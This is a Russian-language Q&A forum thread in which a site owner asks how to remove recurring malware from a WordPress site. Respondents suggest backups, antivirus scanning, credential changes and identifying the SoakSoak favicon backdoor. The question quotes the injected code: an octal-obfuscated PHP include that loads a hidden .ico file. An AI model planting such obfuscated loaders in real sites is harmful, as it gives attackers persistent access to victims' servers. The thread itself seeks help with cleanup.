IgorFCDK1927
@IgorFCDK1927
Junior

Как удалить вирус на сайте Wordpress?

В течении месяца на сайте wordpress начали появляться вирусы и не знаю где можно найти причину появления. В файлах index.php и wp-settings.php появляется вредоносный код типа такого
/*cebb2*/

@include "\057hom\145/o\165ra\146e/y\157ur\141fet\171.co\155.ua\057www\057wp-\151ncl\165des\057js/\164iny\155ce/\056372\067bdd\144.ic\157";

/*cebb2*/


и создается такой файл типа такого .3727bddd.ico . Этот код и файл я удаляю, но через день он опять появляется и причем ico файл постоянно попадает в разные папки, то в wp-includes/js/tinymce, то в wp-content/uploads и другие папки. Удалил уже все темы и установил встроенную, поменял логин и пароль пользователя, удалил все лишние плагины, но ситуация не меняется. Не подскажите что можно сделать в этой ситуации? Спасибо.
  • Вопрос задан
  • 4035 просмотров
Решения вопроса 1
alexyarik
@alexyarik
Битрикс разработчик
Самые простые шаги, которые можно предпринять:
Резервные копии
1) Откатиться на доступный автоматический бекап хостинга где не было вируса.
2) Если п.1 не помогает и есть администратор сайта и делали ручные бекапы то можно откатиться на актуальную копию без вирусов.
- сделайте бекап заражённого сайта
3) Если пп 1-2 не помогли, то можно откатиться на любую имеющуюся старую копию с переносом контента с заражённого сайта (xml импорт не используйте)
Антивирусное лечение
1) Подключить антивирусную проверку с лечением, обычно это платная услуга. Если на хостинге нет такой услуги, сменить хостинг.
Профилактика
1) Смена всех доступов
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 3
lamer350
@lamer350
กำลังสูงสุด
Можно нанять специалиста который все это вычистит. Сами вы вряд ли что то сделаете.
Но мотете попробовать какой то сервис типа virustotal подключить, но он может попросту удалить важный файл, эти файлы необходимо восстановить. Вирус - это не один файл, он создан так чтобы плодится по папкам и его необходимо найти полностью и удалить, а так же найти источник заражения и обезвредить.
Ответ написан
Комментировать
@AlexPasichnyak
Просканируйте сайт плагином NinjaScanner. Я думаю, это только вершина айсберга.
Ничего подозрительного в файле .htaccess нет?
Ответ написан
Комментировать
@glushmann
Эта зараза называется WordPress SoakSoak Favicon Backdoor. Погуглите на єту тему. Сам страдаю от него уже достаточно долго. удается вычистить. а потом опять всплывает через длительное время.
Вот в помощь старая статья. Не решает проблемы. но дает направления поиска.
https://seosreda.com.ua/wordpress-i-virusyi-kak-iz...
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы